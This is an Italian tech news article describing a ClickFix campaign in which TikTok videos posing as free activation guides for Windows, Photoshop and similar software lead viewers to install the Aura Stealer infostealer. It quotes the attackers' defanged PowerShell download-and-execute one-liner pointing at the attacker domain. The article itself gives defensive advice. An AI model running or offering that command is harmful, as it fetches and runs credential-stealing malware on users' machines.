Attacchi ClickFix su TikTok: falsi tutorial attivano malware

Una nuova campagna di attacchi ClickFix sta sfruttando video pubblicati su TikTok per distribuire malware in grado di rubare informazioni sensibili dagli account degli utenti. I video si presentano come guide gratuite per attivare software popolari come Windows, Microsoft 365, Adobe Premiere, Photoshop e CapCut Pro. Si tratta quindi di una vera e propria campagna di phishing.

Come funziona l’attacco su TikTok

Le clip condivise nascondono un attacco di social engineering mirato a spingere le vittime ad eseguire comandi PowerShell malevoli. L’istruzione tipica mostrata nei video รจ:

Pubblicitร 
iex (irm slmgr[.]win/photoshop

A seconda del software imitato, il nome all’interno dellโ€™URL varia (ad esempio windows o spotify). L’esecuzione del comando collega il sistema ad un dominio controllato dagli attaccanti (slmgr[.]win) che scarica script PowerShell aggiuntivi e due eseguibili dannosi.

Il primo file, updater.exe, รจ una variante del malware Aura Stealer, specializzato nel furto di credenziali salvate nei browser, cookie di autenticazione, chiavi di wallet di criptovalute e dati di accesso ad applicazioni desktop. Una volta eseguito, il malware invia queste informazioni ai server dei cybercriminali e permette l’accesso remoto agli account compromessi.

Un secondo componente, source.exe, viene poi scaricato e compilato localmente tramite il compilatore .NET (csc.exe) per l’iniezione e l’esecuzione di codice malevolo direttamente in memoria. La funzione esatta di questo payload non รจ stata perรฒ ancora chiarita.

Come difendersi dagli attacchi ClickFix

Gli esperti raccomandano a chiunque abbia assistito all’esecuzione di istruzioni simili di cambiare immediatamente tutte le password. Gli attacchi ClickFix sono sempre piรน diffusi e utilizzati per distribuire ransomware e malware mirati al furto di criptovalute.

Come regola generale, gli utenti dovrebbero evitare di copiare comandi da fonti non verificate ed eseguirli su PowerShell, Terminale o Prompt dei comandi, anche quando provengono da piattaforme apparentemente affidabili come TikTok.

Iscriviti a Google News Per restare sempre aggiornato seguici su Google News! Seguici
Pubblicitร 
Claudio Garau
Claudio Garau
Web developer, programmatore, Database Administrator, Linux Admin, docente e copywriter specializzato in contenuti sulle tecnologie orientate a Web, mobile, Cybersecurity e Digital Marketing per sviluppatori, PA e imprese.

Leggi anche...

The Social Reckoning: il nuovo film su Facebook e Zuckerberg

Il mondo del cinema si prepara a un nuovo...

Instagram introduce “Your Algorithm”: il controllo degli utenti nel feed

Instagram ha recentemente lanciato una nuova funzionalitร  chiamata โ€œYour...

Instagram Plus: il nuovo abbonamento con storie da 48 ore

Instagram ha recentemente lanciato Instagram Plus, un abbonamento premium...

Hacker rubano 180 GB di dati a Ikea: l’allerta sulla cybersecurity

Ikea ha subito un attacco informatico che ha portato...

Meta Ray-Ban Display: nuove funzioni e opportunitร  per sviluppatori

I Meta Ray-Ban Display, gli occhiali smart di Meta,...

X si impegna a rimuovere contenuti illegali entro 24 ore: sfide e responsabilitร 

Negli ultimi anni, la questione della gestione dei contenuti...
Pubblicitร